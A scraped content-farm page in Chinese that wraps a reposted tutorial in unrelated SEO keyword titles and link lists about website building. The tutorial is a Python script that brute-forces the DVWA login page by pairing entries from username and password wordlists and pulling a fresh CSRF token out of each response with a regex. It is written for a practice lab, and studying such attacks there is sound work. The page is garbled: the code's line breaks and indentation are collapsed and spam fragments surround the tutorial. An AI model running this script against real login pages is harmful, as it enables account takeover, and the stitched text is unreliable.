当前位置: 首页 > news >正文

济南网站建设熊掌号长春建站模板源码

济南网站建设熊掌号,长春建站模板源码,红酒网站页面设计总结,个人博客网站的建设结构图目录 写在前面 使用方法 相关代码 写在前面 最近在学习使用Burp Suite时发现其intruder模块无法实现多种模式的混合使用,就如想要暴力破解账号和口令两个区域并同时跟踪网页的csrf_token时BP似乎不能很方便的实现这一功能,于是自己在练习时就想到了用…

目录

写在前面

使用方法

相关代码


写在前面

最近在学习使用Burp Suite时发现其intruder模块无法实现多种模式的混合使用,就如想要暴力破解账号和口令两个区域并同时跟踪网页的csrf_token时BP似乎不能很方便的实现这一功能,于是自己在练习时就想到了用python脚本的方式来弥补BP中的这一欠缺,其中的核心便是用python中的正则匹配库实现对Response内容的分析和定位需要获取的内容

相关代码

import requests
import re# 填入请求地址
url = "http://192.168.160.131/DVWA/vulnerabilities/brute/"
# 填入请求头中的Cookie值
cookie = "security=high; PHPSESSID=ekjn7547iglbc0stpsef2m9gm3"
# 填入页面中下次一请求需要携带的csrf_token值
csrf_token = "99095598fea3cf9d615b2687747aaf5f"
bf_flag = False
# success为未知,但可以尝试出登陆失败的信息
success = ""
failure = "Username and/or password incorrect"
count = 0
# 定义正则表达式匹配规则,匹配某个input标签中name为user_token的字段的value值
# <input[^>]匹配以<input开始到>字符串
# 正则表达式的规则中+号后面的规则会继续对加号前面所匹配到字符串做处理,相当于层层筛选
# name=["\']user_token["\']匹配name="user_token"或name='user_token'字符串
# [^>]+value=["\']在input标签中,找到属性value=
# ([^"\']+)用来获取到匹配到的value中属性的值
# [^"\']+匹配非引号的字符
model = r'<input[^>]+name=["\']user_token["\'][^>]+value=["\']([^"\']+)["\']'with open("./user.txt", 'r') as file_usr:with open("./pswd.txt", 'r') as file_pwd:while not bf_flag:first = file_usr.readline()if not first:break# 在内层循环之前,重置文件指针到文件开头实现遍历file_pwd.seek(0)while not bf_flag:second = file_pwd.readline()if not second:breakfirst = first.strip()second = second.strip()count += 1response = requests.get(url = url,params = {"username":first, "password":second, "Login":"Login", "user_token":csrf_token},headers = {"Cookie":cookie})match = re.search(model, response.text)if match:# 获取正则表达式匹配到的内容,这里正常情况下只会匹配到一个,用.group(1)即可csrf_token = match.group(1)else:print("获取token失败,请检查匹配规则")if failure in response.text:print("第"+ str(count) +"次尝试--失败:",first + " " + second)else:print("第"+ str(count) +"次尝试--成功:",first + " " + second)bf_flag = True;break;

使用方法

在登陆界面随意尝试,查看并复制请求头中的Cookie值

在页面元素中查找下一次向服务器请求所需要的csrf_token值 

填写到脚本的对应位置

根据自己的情况分别引入账号、口令两个字典文件

 运行代码等待破解成功

http://www.yayakq.cn/news/602992/

相关文章:

  • 新网站优化网站建设大纲
  • 网站都有什么功能抖音代运营推广
  • 互联网c2c交易类网站详细策划书成全视频免费观看在线看只手遮天九千岁
  • 毕业设计2网站建设宁阳网站开发
  • 深圳专业网站设计制作做后台系统的网站
  • 哪个网站有建设需要等文件跨境电商网站怎么做
  • vr全景网站开发邯郸信息港最新招聘信息2023
  • 2017网站设计如何报价网站栏目设计
  • 制作图片网站设计师 推荐 网站
  • 手机app网站海珠区建设和水务局网站
  • 炫酷网站设计企业网站建设排名推荐
  • 中国自适应网站建设建设部网站统计
  • 不会编程做网站工程施工项目管理软件
  • 公司的网站建设计入什么科目嘉盛建设集团官方网站
  • 网站制作建立餐饮行业网站建设
  • 大型淘宝客返利网站建设网上房地产查询
  • 佛山服务类网站建设学做效果图网站有哪些
  • 凡科建站官网为企业做网站还有前途吗
  • 站点创建免费建站平台哪家好
  • 网站建设账务处理网站制作多少钱
  • 福田网站建设的工具网站搭建有免费的吗
  • 深远互动 网站建设东阳畅销自适应网站建设
  • 天津常规网站建设系列网站开发和网络安全
  • 怎么做网站超链接培训网站建设方案
  • 百度网站提交入口百度福州建网站哪家公司好
  • 网站策划厂m3型虚拟主机 wordpress
  • 做公司网站注意事项医院网站建设的理由
  • 广东购物网站建设价格画江湖网站开发文档
  • 网站管理后台文章排序wordpress 提供api
  • 国外单页制作网站模板下载网站 建设公司